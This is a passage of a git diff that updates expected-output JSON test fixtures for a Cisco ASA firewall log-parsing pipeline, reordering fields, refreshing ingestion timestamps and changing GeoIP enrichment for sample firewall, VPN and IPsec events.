+4065,10 @@ "asa": { "command_line_arguments": "'clear'" } - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { 
@@ -4112,7 +4100,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:31:25.163193300Z", + "ingested": "2021-12-14T14:36:13.057653274Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-502103: User priv level changed: Uname: enable_15 From: 1 To: 15", "code": "502103", "kind": "event", @@ -4190,7 +4178,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163198100Z", + "ingested": "2021-12-14T14:36:13.057653640Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-605004: Login denied from 10.10.1.212/51923 to FCD-FS-LAN:10.10.1.254/https for user \"*****\"", "code": "605004", "kind": "event", @@ -4211,16 +4199,6 @@ } }, { - "log": { - "level": "informational" - }, - "source": { - "address": "10.10.0.87", - "ip": "10.10.0.87" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", @@ -4242,15 +4220,22 @@ "10.10.0.87" ] }, + "log": { + "level": "informational" + }, "host": { "user": { "name": "admin" }, "hostname": "dev01" }, + "source": { + "address": "10.10.0.87", + "ip": "10.10.0.87" + }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163202100Z", + "ingested": "2021-12-14T14:36:13.057653993Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-611102: User authentication failed: IP address: 10.10.0.87, Uname: admin", "code": "611102", "kind": "event", @@ -4265,7 +4250,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -4321,7 +4309,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163207200Z", + "ingested": "2021-12-14T14:36:13.057654354Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-605005: Login permitted from 10.10.0.87/6651 to FCD-FS-LAN:10.10.1.254/ssh for user \"admin\"", "code": "605005", "kind": "event", 
@@ -4342,16 +4330,6 @@ } }, { - "log": { - "level": "informational" - }, - "source": { - "address": "10.10.0.87", - "ip": "10.10.0.87" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", @@ -4373,15 +4351,22 @@ "10.10.0.87" ] }, + "log": { + "level": "informational" + }, "host": { "user": { "name": "admin" }, "hostname": "dev01" }, + "source": { + "address": "10.10.0.87", + "ip": "10.10.0.87" + }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163212600Z", + "ingested": "2021-12-14T14:36:13.057654733Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-611101: User authentication succeeded: IP address: 10.10.0.87, Uname: admin", "code": "611101", "kind": "event", @@ -4396,37 +4381,12 @@ }, "cisco": { "asa": {} - } - }, - { - "log": { - "level": "notification" - }, - "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Oxfordshire", - "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" - } - }, - "address": "81.2.69.144", - "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", 
@@ -4445,12 +4405,31 @@ "81.2.69.144" ] }, + "log": { + "level": "notification" + }, "host": { "hostname": "dev01" }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-ENG", + "city_name": "London", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "England", + "location": { + "lon": -0.0931, + "lat": 51.5142 + } + }, + "address": "81.2.69.144", + "ip": "81.2.69.144" + }, "event": { "severity": 5, - "ingested": "2021-12-09T13:31:25.163218400Z", + "ingested": "2021-12-14T14:36:13.057655087Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 81.2.69.144, IP = 81.2.69.144, Security negotiation complete for LAN-to-LAN Group (81.2.69.144) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d", "code": "713049", "kind": "event", @@ -4464,7 +4443,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -4473,20 +4455,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -4529,7 +4505,7 @@ "event": { "severity": 4, "duration": 0, - "ingested": "2021-12-09T13:31:25.163225Z", + "ingested": "2021-12-14T14:36:13.057655452Z", "original": "Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 81.2.69.144, Username = 81.2.69.144, IP = 81.2.69.144, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested", "code": "113019", "kind": "event", 
@@ -4548,19 +4524,6 @@ } }, { - "log": { - "level": "warning" - }, - "source": { - "user": { - "name": "john" - }, - "address": "192.168.50.3", - "ip": "192.168.50.3" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", @@ -4582,12 +4545,22 @@ "192.168.50.3" ] }, + "log": { + "level": "warning" + }, "host": { "hostname": "dev01" }, + "source": { + "user": { + "name": "john" + }, + "address": "192.168.50.3", + "ip": "192.168.50.3" + }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:25.163231500Z", + "ingested": "2021-12-14T14:36:13.057655837Z", "original": "Apr 27 02:03:03 dev01: %ASA-4-722051: Group \u003cVPN5Policy\u003e User \u003cjohn\u003e IP \u003c192.168.50.3\u003e IPv4 Address \u003c192.168.50.5\u003e IPv6 address \u003c::\u003e assigned to session", "code": "722051", "kind": "event", @@ -4606,40 +4579,12 @@ }, "assigned_ip": "192.168.50.5" } - } - }, - { - "log": { - "level": "informational" - }, - "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Oxfordshire", - "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" - } - }, - "address": "81.2.69.144", - "user": { - "name": "testuser" - }, - "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", 
@@ -4661,13 +4606,35 @@ "81.2.69.144" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "dev01" }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-ENG", + "city_name": "London", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "England", + "location": { + "lon": -0.0931, + "lat": 51.5142 + } + }, + "address": "81.2.69.144", + "user": { + "name": "testuser" + }, + "ip": "81.2.69.144" + }, "event": { "severity": 6, "reason": "User Requested", - "ingested": "2021-12-09T13:31:25.163236500Z", + "ingested": "2021-12-14T14:36:13.057656196Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 81.2.69.144 WebVPN session terminated: User Requested.", "code": "716002", "kind": "event", @@ -4685,22 +4652,12 @@ "group_name": "another-policy" } } - } - }, - { - "log": { - "level": "informational" - }, - "source": { - "user": { - "name": "alice" - }, - "address": "192.168.50.1", - "ip": "192.168.50.1" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", @@ -4722,13 +4679,23 @@ "192.168.50.1" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "dev01" }, + "source": { + "user": { + "name": "alice" + }, + "address": "192.168.50.1", + "ip": "192.168.50.1" + }, "event": { "severity": 6, "reason": "Idle timeout", - "ingested": "2021-12-09T13:31:25.163241700Z", + "ingested": "2021-12-14T14:36:13.057656555Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User alice IP 192.168.50.1 WebVPN session terminated: Idle timeout.", "code": "716002", "kind": "event", @@ -4746,7 +4713,10 @@ "group_name": "another-policy" } } - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { 
@@ -4760,20 +4730,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -4816,7 +4780,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:31:25.163248200Z", + "ingested": "2021-12-14T14:36:13.057656978Z", "original": "Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 81.2.69.144/6370 to outside:192.168.157.61/23", "code": "710003", "kind": "event", @@ -4848,20 +4812,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -4908,7 +4866,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:31:25.163253900Z", + "ingested": "2021-12-14T14:36:13.057657339Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/123123 locally", "code": "434004", "kind": "event", 
@@ -4941,20 +4899,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5002,7 +4954,7 @@ "event": { "severity": 4, "action": "drop", - "ingested": "2021-12-09T13:31:25.163259500Z", + "ingested": "2021-12-14T14:36:13.057657709Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/514514", "code": "434002", "outcome": "unknown" @@ -5026,20 +4978,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5082,7 +5028,7 @@ "event": { "severity": 6, "reason": "Failed to locate egress interface", - "ingested": "2021-12-09T13:31:25.163263900Z", + "ingested": "2021-12-14T14:36:13.057658068Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:81.2.69.144/7777 to 192.168.2.2/123412", "code": "110002", "kind": "event", 
@@ -5114,20 +5060,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5175,7 +5115,7 @@ "event": { "severity": 4, "reason": "Duplicate TCP SYN with different initial sequence number", - "ingested": "2021-12-09T13:31:25.163269600Z", + "ingested": "2021-12-14T14:36:13.057658422Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:81.2.69.144/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number", "code": "419002", "kind": "event", @@ -5205,20 +5145,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5260,7 +5194,7 @@ "event": { "severity": 6, "action": "created", - "ingested": "2021-12-09T13:31:25.163275700Z", + "ingested": "2021-12-14T14:36:13.057658891Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been created.", "code": "602303", "outcome": "success" 
@@ -5283,20 +5217,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5337,7 +5265,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163281300Z", + "ingested": "2021-12-14T14:36:13.057659247Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been deleted.", "code": "602304", "kind": "event", @@ -5372,20 +5300,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5423,7 +5345,7 @@ "event": { "severity": 5, "reason": "Received a IKE_INIT_SA request", - "ingested": "2021-12-09T13:31:25.163287900Z", + "ingested": "2021-12-14T14:36:13.057659621Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request", "code": "750002", "kind": "event", 
@@ -5455,20 +5377,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5506,7 +5422,7 @@ "event": { "severity": 4, "reason": "Negotiation aborted due to Failed to locate an item in the database", - "ingested": "2021-12-09T13:31:25.163292700Z", + "ingested": "2021-12-14T14:36:13.057659977Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database", "code": "750003", "kind": "event", @@ -5526,16 +5442,6 @@ } }, { - "log": { - "level": "notification" - }, - "source": { - "address": "192.168.1.1", - "ip": "192.168.1.1" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", @@ -5554,13 +5460,20 @@ "192.168.1.1" ] }, + "log": { + "level": "notification" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1" + }, "event": { "severity": 5, "reason": "PHASE 2 COMPLETED", - "ingested": "2021-12-09T13:31:25.163296900Z", + "ingested": "2021-12-14T14:36:13.057660341Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 192.168.1.1, PHASE 2 COMPLETED (msgid=bbe383e88)", "code": "713120", "kind": "event", 
@@ -5577,19 +5490,12 @@ }, "cisco": { "asa": {} - } - }, - { - "log": { - "level": "notification" - }, - "source": { - "address": "192.168.157.61", - "ip": "192.168.157.61" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", @@ -5608,13 +5514,20 @@ "192.168.157.61" ] }, + "log": { + "level": "notification" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.157.61", + "ip": "192.168.157.61" + }, "event": { "severity": 5, "reason": "Duplicate first packet detected", - "ingested": "2021-12-09T13:31:25.163341Z", + "ingested": "2021-12-14T14:36:13.057660704Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 192.168.157.61, Duplicate first packet detected. Ignoring packet.", "code": "713202", "kind": "event", @@ -5628,19 +5541,12 @@ }, "cisco": { "asa": {} - } - }, - { - "log": { - "level": "informational" - }, - "source": { - "address": "192.168.1.1", - "ip": "192.168.1.1" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", @@ -5659,13 +5565,20 @@ "192.168.1.1" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1" + }, "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-12-09T13:31:25.163350100Z", + "ingested": "2021-12-14T14:36:13.057661066Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable!", "code": "713905", "kind": "event", @@ -5681,7 +5594,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { 
@@ -5708,7 +5624,7 @@ "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-12-09T13:31:25.163355500Z", + "ingested": "2021-12-14T14:36:13.057661421Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713904: All IPSec SA proposals found unacceptable!", "code": "713904", "kind": "event", @@ -5753,7 +5669,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:25.163360800Z", + "ingested": "2021-12-14T14:36:13.057661767Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 192.168.1.1, All IPSec SA proposals found unacceptable!", "code": "713903", "kind": "event", @@ -5797,7 +5713,7 @@ "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-12-09T13:31:25.163365600Z", + "ingested": "2021-12-14T14:36:13.057662122Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713902: Group = 100.60.140.10, All IPSec SA proposals found unacceptable!", "code": "713902", "kind": "event", @@ -5819,16 +5735,6 @@ ] }, { - "log": { - "level": "informational" - }, - "source": { - "address": "192.168.1.1", - "ip": "192.168.1.1" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", @@ -5847,13 +5753,20 @@ "192.168.1.1" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1" + }, "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-12-09T13:31:25.163370900Z", + "ingested": "2021-12-14T14:36:13.057662478Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable!", "code": "713901", "kind": "event", @@ -5869,7 +5782,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file 
diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log-expected.json index 48c6d1a9356..941db57a52e 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa-fix.log-expected.json @@ -57,7 +57,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:35.036770200Z", + "ingested": "2021-12-14T14:36:22.161214817Z", "original": "Apr 17 2020 14:08:08 SNL-ASA-VPN-A01 : %ASA-6-302016: Teardown UDP connection 110577675 for Outside:10.123.123.123/53723(LOCAL\\Elastic) to Inside:10.233.123.123/53 duration 0:00:00 bytes 148 (zzzzzz)", "code": "302016", "kind": "event", @@ -134,7 +134,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:35.036793100Z", + "ingested": "2021-12-14T14:36:22.161217172Z", "original": "Apr 17 2020 14:00:31 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny icmp src Inside:10.123.123.123 dst Outside:10.123.123.123 (type 11, code 0) by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -203,7 +203,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:35.036798400Z", + "ingested": "2021-12-14T14:36:22.161217584Z", "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.123.123.123/6316 dst outside:10.123.123.123/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3afb522, 0x0]", "code": "106023", "kind": "event", @@ -279,7 +279,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:35.036803900Z", + "ingested": "2021-12-14T14:36:22.161220778Z", "original": "Apr 17 2020 14:16:20 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny udp src Inside:10.123.123.123/57621(LOCAL\\Elastic) dst Outside:10.123.123.123/57621 by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -340,7 +340,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:31:35.036832700Z", + "ingested": "2021-12-14T14:36:22.161221227Z", "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-2-106017: Deny IP due to Land Attack from 10.123.123.123 to 10.123.123.123", "code": "106017", "kind": "event", @@ -401,7 +401,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:31:35.036838Z", + "ingested": "2021-12-14T14:36:22.161221587Z", "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-3-313008: Denied IPv6-ICMP type=134, code=0 from fe80::1ff:fe23:4567:890a on interface ISP1", "code": "313008", "kind": "event", @@ -471,7 +471,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:35.036843Z", + "ingested": "2021-12-14T14:36:22.161221960Z", "original": "Jun 08 2020 12:59:57: %ASA-4-313009: Denied invalid ICMP code 9, for Inside:10.255.0.206/8795 (10.255.0.206/8795) to identity:10.12.31.51/0 (10.12.31.51/0), ICMP id 295, ICMP type 8", "code": "313009", "kind": "event", @@ -545,7 +545,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:35.036865900Z", + "ingested": "2021-12-14T14:36:22.161222339Z", "original": "Oct 20 2019 15:42:53: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575) -\u003e inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f]", "code": "106100", "kind": "event", @@ -615,7 +615,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:35.036871100Z", + "ingested": "2021-12-14T14:36:22.161222691Z", "original": "Oct 20 2019 15:42:54: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575)(LOCAL\\\\username) -\u003e inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f]", "code": "106100", "kind": "event", 
@@ -688,7 +688,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:31:35.036875Z", + "ingested": "2021-12-14T14:36:22.161223047Z", "original": "Aug 6 2020 11:01:37: %ASA-session-3-106102: access-list dev_inward_client permitted udp for user redacted outside/10.123.123.20(49721) -\u003e inside/10.223.223.40(53) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]", "code": "106102", "kind": "event", @@ -721,20 +721,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -783,7 +777,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:31:35.036879900Z", + "ingested": "2021-12-14T14:36:22.161223419Z", "original": "Aug 6 2020 11:01:38: %ASA-1-106103: access-list filter denied icmp for user joe inside/10.1.2.3(64321) -\u003e outside/81.2.69.144(8080) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]", "code": "106103", "kind": "event", diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log-expected.json index d89b51ee8f0..69bb9b5d45e 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-asa.log-expected.json 
@@ -59,7 +59,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363216200Z", + "ingested": "2021-12-14T14:36:23.392237546Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256", "code": "305011", "kind": "event", @@ -138,7 +138,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363224400Z", + "ingested": "2021-12-14T14:36:23.392242512Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", "code": "302013", "kind": "event", @@ -224,7 +224,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363228700Z", + "ingested": "2021-12-14T14:36:23.392243229Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", "code": "302014", "kind": "event", @@ -309,7 +309,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363232700Z", + "ingested": "2021-12-14T14:36:23.392243621Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", "code": "302014", "kind": "event", @@ -394,7 +394,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363237300Z", + "ingested": "2021-12-14T14:36:23.392244026Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", "code": "302014", "kind": "event", 
@@ -479,7 +479,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363241900Z", + "ingested": "2021-12-14T14:36:23.392244408Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", "code": "302014", "kind": "event", @@ -564,7 +564,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363246800Z", + "ingested": "2021-12-14T14:36:23.392244805Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", "code": "302014", "kind": "event", @@ -649,7 +649,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": 